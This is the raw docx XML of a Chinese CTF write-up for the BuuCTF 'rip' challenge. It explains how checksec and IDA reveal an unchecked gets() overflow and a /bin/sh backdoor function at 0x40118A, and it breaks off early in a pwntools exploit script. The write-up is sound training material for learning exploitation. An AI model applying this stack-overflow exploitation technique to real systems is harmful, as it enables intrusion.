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14F432" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="ida静态分析"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E91ACD" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="使用checksec命令查看保护方式"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>checksec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令查看保护方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5EF08" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05AD4B4E" wp14:editId="642EB34B">
            <wp:extent cx="5334000" cy="1702904"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture" descr="image-20251204181144225" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204181144225.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1702904"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FE777" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到没有任何保护，可以直接利用栈溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F86BE" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="使用ida对pwn1进行反汇编"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwn1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行反汇编</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60D793" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B1736" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EA13AC8" wp14:editId="3A58F222">
            <wp:extent cx="5334000" cy="4551218"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture" descr="image-20251204181849781" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="15" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204181849781.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4551218"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F679B8" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014DD65A" wp14:editId="2224DF90">
            <wp:extent cx="5334000" cy="1697181"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture" descr="image-20251204182316103" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="18" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204182316103.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1697181"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A82823" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数定义了一个字符数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s[15]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求输入，在没有任何保护方式以及判定输入字符串大小的情况下很容易数组越界导致缓冲区溢出，我们可以以此为突破点。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的定义处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BA158DF" wp14:editId="77DB6C3D">
            <wp:extent cx="5334000" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture" descr="image-20251204183006508" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="21" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204183006508.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1200150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到这里没有任何检测输入长度的措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218AB93" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="开始寻找可利用栈溢出使程序崩溃的函数地址"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始寻找可利用栈溢出使程序崩溃的函数地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077ADD41" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+F12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找所有字符串，找到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很可能是后门</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F86B899" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D4671B" wp14:editId="6A8455E4">
            <wp:extent cx="5334000" cy="2275342"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="25" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204212039437.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2275342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E646F9C" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双击后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71DFF8EC" wp14:editId="385D618F">
            <wp:extent cx="5334000" cy="587876"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="Picture" descr="image-20251204212419980" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="28" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204212419980.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="587876"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A7A71" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数处交叉引用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XREF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71746D1C" wp14:editId="1A8AB3ED">
            <wp:extent cx="5334000" cy="1589666"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Picture" descr="image-20251204212731772" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="31" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204212731772.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1589666"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D81D36" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x401186</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fun+4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x40118A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E58A7E" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反编译为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56253C2D" wp14:editId="6D826336">
            <wp:extent cx="5334000" cy="1646738"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Picture" descr="image-20251204212950013" title="fig:"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="34" name="Picture" descr="D:\zbw\CTF_Notes\WriteUp\BuuCTF-rip.assets\image-20251204212950013.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1646738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以确定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x40118A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的指令地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FED07F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="构建payload编写exp"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57919857" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pwn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>和靶机进行连接</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> remote(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'ip'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>函数的内存地址</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fun_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t>0x40118A</w:t>
      </w:r>
